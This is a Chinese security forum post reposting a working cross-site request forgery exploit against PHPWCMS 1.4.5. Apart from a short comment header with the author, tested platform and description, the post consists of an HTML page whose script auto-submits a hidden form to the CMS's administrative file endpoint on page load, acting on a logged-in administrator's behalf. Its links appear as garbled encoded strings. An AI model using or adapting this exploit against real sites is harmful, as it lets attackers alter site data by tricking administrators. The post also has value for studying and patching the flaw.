首页
社区
课程
招聘
[推荐]PHPWCMS跨站点请求伪造漏洞利用带工具源码!
发表于: 2010-7-20 23:30 2358

[推荐]PHPWCMS跨站点请求伪造漏洞利用带工具源码!

2010-7-20 23:30
2358
<?php
        /*
                Exploit Title: PHPWCMS Cross-Site Request Forgery Vulnerability
                Date: 06/16/2010
                Author: Jeremiah Talamantes
                Software Link: 16dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8Z5M7s2N6U0L8i4y4Q4x3X3g2Y4L8$3!0Y4L8r3g2U0L8$3c8W2i4K6u0W2j5$3!0E0i4K6u0r3k6X3W2D9k6i4y4Q4x3V1k6H3K9s2m8%4j5$3#2K6i4K6g2X3M7U0x3&6z5q4)9J5k6i4A6A6M7l9`.`.
                Version: 1.4.5 r398
                Tested on: WinXP SP2 (EN) on WAMP 2.0
                CVE: N/A
                
                Jeremiah Talamantes
                RedTeam Security (RedTeam Labs)
                dcbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0W2k6s2c8W2j5h3#2K6k6h3y4#2M7X3g2Q4x3X3g2U0L8$3#2Q4x3V1k6D9j5h3u0K6
                
                Description:
                A vulnerability has been identified in PHPWCMS, which could be exploited to conduct
cross-site request forgery attacks.
                This issue is caused due to input validation errors in the administrative interface when
processing HTTP requests, 
                which could be exploited by attackers to manipulate certain data by tricking an
administrator into visiting a malicious web page.
        */
?>
<html>
<head>
        <title>PHPWCMS 1.4.5 r389 Cross Site Request Forgery</title>
        <script type="text/javascript">
                function myfunc () {
                        var frm = document.getElementById("csrf");
                        frm.submit();
                }
                window.onload = myfunc;
        </script>
</head>
<body>
        <!-- Modify the form action parameter to suit your installation -->
        <form id="csrf" name="csrf" method="POST"
action="http://localhost/phpwcms/phpwcms.php?do=files&f=0">
                <input type="hidden" name="dir_newname" value="Game Over!" />
                <input type="hidden" name="dir_gallery" value="0" />
                <input type="hidden" name="dir_sort" value="0" />
                <input type="hidden" name="dir_aktiv" value="1" />
                <input type="hidden" name="dir_public" value="1" />
                <input type="hidden" name="dir_pid" value="0" />
                <input type="hidden" name="dir_aktion" value="1" />
        </form>
</body>
</html>

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回